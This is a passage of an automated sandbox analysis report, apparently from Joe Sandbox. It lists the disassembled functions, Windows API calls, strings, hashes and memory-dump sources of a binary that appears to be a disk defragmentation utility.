                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402005$3402065$3402067$3402068$3402069$3402070$3402071$3402072$3402084
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-328498535
                                                                                                                                                                                                                                                                                    • Opcode ID: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                    • Instruction ID: 1067327c746e147da740696a904bc1cbb70a89f86cbb7c2e495eb833b01c89ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19e8cdb6f5ee6091fff7530154948aa3e76a5209e14532d290abc9f16ea37a07
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36413CF0B907407AD260AF618D43FEA3268AF84F04F60C42FB70E765D1CAEC6905969D
                                                                                                                                                                                                                                                                                    Function 00417F00 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 110windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00417F45
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00417F5B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001001,00000000,?), ref: 0041804D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3401074$3401075$3401076$3401077$8<$DiskDefrag$Mid_Back_Color$Window
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2758692112
                                                                                                                                                                                                                                                                                    • Opcode ID: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                    • Instruction ID: 56ac88722a8962ac1f975558d68bc042bced7a88e006b99efbc398d4c5261ff8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8722d59c07b94f6922f7548e3e672599eeab7783c23535719575370a0de5a5f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B23156B07903007AE274EB258C83FEA72659F44B14F20452FB71E762D1CEF97844565C
                                                                                                                                                                                                                                                                                    Function 00451C80 Relevance: 18.2, APIs: 12, Instructions: 181commemoryCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00451CBB
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0047D360,00000000,00000001,0047D170,?), ref: 00451CDF
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451CF8
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451D24
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451D4B
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00451D72
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451E17
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451E1E
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00451E25
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00451E37
                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0047EF4C), ref: 00451E69
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00451EA8
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$String$AllocCreateFreeInitializeInstance
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 162617764-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a3acebe906db87488b43d3aef87afcda0e18f97818647458927d115f12b3f92
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d459dc24a125815d5dafe60fd6d4b8e488a7a08734036bff8a68fe5d906ce4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08712875A183509FC310CF68C844A5ABBE8FF89B20F158A5EF99897360D775E804CF92
                                                                                                                                                                                                                                                                                    Function 0042FDF0 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 331windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FE87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FF25
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 0042FF79
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FFF3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00430097
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 0043015F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00430211
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                    • Opcode ID: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 62bdf63df222c89057064cae7919c1e413492940edc838130925d2253cd5f780
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80C1E5312043008BC710EF24D995B9BB7E5BF88704F500A7EF9499B296DB74ED49CB9A
                                                                                                                                                                                                                                                                                    Function 0040FCA0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 189windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040FD1F
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040FD37
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040FD46
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040FDC3
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0040FE29
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0040FE38
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120F,?,00000000), ref: 0040FE6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120B,00000000,?), ref: 0040FE82
                                                                                                                                                                                                                                                                                    • RectVisible.GDI32(?,?), ref: 0040FEAC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect$CursorObjectScreenVisible
                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                    • API String ID: 883400287-2564639436
                                                                                                                                                                                                                                                                                    • Opcode ID: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                    • Instruction ID: e57791d17a927b35fa3e7b028ca1617c0da729b9688da5cd3a54cba97037c013
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB8119B11083819FD325DF65C984F9BB7E8FF88704F004A2DF58997291EB74A944CB96
                                                                                                                                                                                                                                                                                    Function 0042D9D0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 172windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042DA84
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0042DAAE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0042DAD4
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0042DAF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042DB00
                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 0042DB38
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042DBBE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ColorIndex, xrefs: 0042DA3E
                                                                                                                                                                                                                                                                                    • DiskDefrag\Setting Option\Gereral\DefragColor, xrefs: 0042DA43
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$BitmapClientFillMessageObjectSelectSend
                                                                                                                                                                                                                                                                                    • String ID: ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                    • API String ID: 24576784-1631410767
                                                                                                                                                                                                                                                                                    • Opcode ID: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                    • Instruction ID: 821a5ab27c6a8f9e6b02cc0ac72b1b3995420b0d805852c9f35119affff3cd9f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2617EB1608340AFC304DF68D884E5BB7E8FF88714F408A2EF59997291DB74E944CB96
                                                                                                                                                                                                                                                                                    Function 00456AB0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B14
                                                                                                                                                                                                                                                                                      • Part of subcall function 00454290: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00454306
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00456B57
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456B7E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456BA5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00456BD6
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000000), ref: 00456C07
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000001), ref: 00456C38
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00456C5F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateFileUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1066634676-259948872
                                                                                                                                                                                                                                                                                    • Opcode ID: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9c2aacaccead671dbc3a96f70d0e1eab3c71fbf61e1a23b3dd7d7caf89dd1f7c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39a1f70db7202d3b1c3ce52b526e9e0b0aae69084ae2661cf5f3dced9512c8e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C75109377043006BD214AF69AC86BAEB394EF9C725F80013FF509D3282DA255548C7AB
                                                                                                                                                                                                                                                                                    Function 00422890 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 139windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 004228FF
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000004,00000000), ref: 0042292A
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(113262B6), ref: 00422945
